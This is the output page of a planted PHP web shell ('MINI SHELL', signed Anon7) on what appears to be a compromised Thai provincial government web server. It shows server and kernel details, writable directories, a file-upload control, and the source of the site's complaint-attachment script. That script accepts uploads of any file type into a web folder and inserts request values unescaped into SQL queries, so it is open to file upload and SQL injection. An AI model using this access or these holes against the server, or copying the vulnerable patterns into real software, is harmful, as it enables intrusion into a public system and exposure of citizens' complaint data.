MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_integration/requirement/application/ecomplain/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_integration/requirement/application/ecomplain/attach_file.php
<?
session_start();
include "../../config/config.inc.php";
include("function/function.php");
if(!isset($session_username)){
header("Location: ../document/login.php");
}

$folder_img 	= "attach_file/";
if($action == "upload"){
		if($file1_name != "") {
				$up_complate = @copy("$file1" , "$folder_img$file1_name");
				//------------------  กรณี insert ------------------------
//				$strSQL_in = "SELECT max(runid) as max_runid FROM tbl_complain LIMIT 0,1";
//				$Result_in = mysql_db_query($dbname,$strSQL_in);
//				$Rs_in = mysql_fetch_object($Result_in);
//				$in_id = $Rs_in->max_runid + 1;
				 if($attach_file == "add_in"){
				 $strSQL_ch_in = "SELECT * FROM tbl_complain ORDER BY runid DESC LIMIT 0,1";
				$Result_ch_in = mysql_db_query($dbname,$strSQL_ch_in);
				$Rs_ch_in = mysql_fetch_object($Result_ch_in);
				if(($Rs_ch_in->subject =="" or $Rs_ch_in->subject == NULL) AND ($Rs_ch_out->attach_sb_out != "")){
					$strSQL_in1 = "UPDATE tbl_complain SET attach_sb_in='$file1_name' WHERE runid='".$Rs_ch_in->runid."'";
				}else{
					$strSQL_in1 = "INSERT INTO tbl_complain(attach_sb_in)VALUES('$file1_name')";
				}
					$Result_in1 = mysql_db_query($dbname,$strSQL_in1);
				
				} // end  if($attach_file == "add_in"){
				
				if($attach_file == "add_out"){
				$strSQL_ch_in = "SELECT * FROM tbl_complain ORDER BY runid DESC LIMIT 0,1";
				$Result_ch_in = mysql_db_query($dbname,$strSQL_ch_in);
				$Rs_ch_in = mysql_fetch_object($Result_ch_in);
					if(($Rs_ch_in->subject =="" or $Rs_ch_in->subject == NULL) AND ($Rs_ch_in->attach_sb_in != "")){
						$strSQL_out1 = "UPDATE tbl_complain SET attach_sb_out='$file1_name' WHERE runid='".$Rs_ch_in->runid."'";
					}else{
						$strSQL_out1 = "INSERT INTO tbl_complain(attach_sb_out)VALUES('$file1_name')";
					}
						$Result_in1 = mysql_db_query($dbname,$strSQL_out1);
				} // end if($attach_file == "add_out"){

				//------------------  กรณี insert ------------------------
				//------------------  กรณี update data ------------------------
				if($attach_file == "xin"){
				$strSQL_nn = "UPDATE tbl_complain SET attach_sb_in='$file1_name' WHERE runid='$runid'";
				}else if($attach_file == "xout"){
				$strSQL_nn = "UPDATE tbl_complain SET attach_sb_out='$file1_name' WHERE runid='$runid'";
				}else{
				$strSQL_nn = "UPDATE tbl_complain SET attach_date_comp='$file1_name' WHERE runid='$runid'";
				}
				mysql_db_query($dbname,$strSQL_nn);
					//------------------  end update data ------------------------
				if($up_complate){
				 echo "
				<script language=\"javascript\">
				alert(\"ระบบทำการบันทึกไฟล์ $file1_name เรียบร้อยแล้ว\\n \");
				location.href='attach_file.php';
			window.close();
				</script>
				";
				exit();
		}else{
						 echo "
				<script language=\"javascript\">
				alert(\"ไม่สามารถบันทึกข้อมูลได้\\n \");
				location.href='attach_file.php';
				</script>
				";
				exit();

		}
		} else {
				 echo "
				<script language=\"javascript\">
				alert(\"ไม่สามารถบันทึกข้อมูลได้\\n \");
				location.href='attach_file.php';
				</script>
				";
				exit();
		}

}

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../../common/style.css" type="text/css" rel="stylesheet" />
<title>Upload File</title>
</head>
<body>
<table width="100%" height="100" align="center" cellpadding="2" cellspacing="1">
<tr>
    <td height="20" bgcolor="#8DA0C0">แนบไฟล์ข้อมูล<b></b></td>
</tr>	
<tr bgcolor="#ffffff">
    <td height="20" colspan="3">
<form name="post" action="?" method="post" enctype="multipart/form-data">	
<input type="hidden" name="action" value="upload">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td bgcolor="#000000"><table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td height="15" colspan="2" align="left" bgcolor="#FFFFFF"><img src="../../images/project1.gif" width="52" height="52" /></td>
      </tr>
      
      <tr>
        <td width="26%" height="20" align="right" bgcolor="#FFFFFF">เลือกไฟล์&nbsp;<b>:</b>&nbsp;</td>
        <td width="74%" bgcolor="#FFFFFF"><input type="file" id="file1" name="file1" style="width:200px;" /></td>
      </tr>
      <tr>
        <td height="20" align="right" bgcolor="#FFFFFF">&nbsp;</td>
        <td bgcolor="#FFFFFF">&nbsp;</td>
      </tr>
      <tr>
        <td height="20" align="right" bgcolor="#FFFFFF">&nbsp;</td>
        <td bgcolor="#FFFFFF"><label>
          &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		  <input type="hidden" name="runid" value="<?=$runid?>">
		  <input type="hidden" name="attach_file" value="<?=$attach_file?>">
          <input type="submit" name="Submit" value="แนบไฟล์" />
          <input type="submit" name="Submit2" value="ปิด" onclick="window.close();" />
        </label></td>
      </tr>
    </table></td>
  </tr>
</table>
</form>
	</td>
</tr>
<tr align="center">
    <td height="20"></td>
</tr>
</table>
</body>
</html>

Anon7 - 2021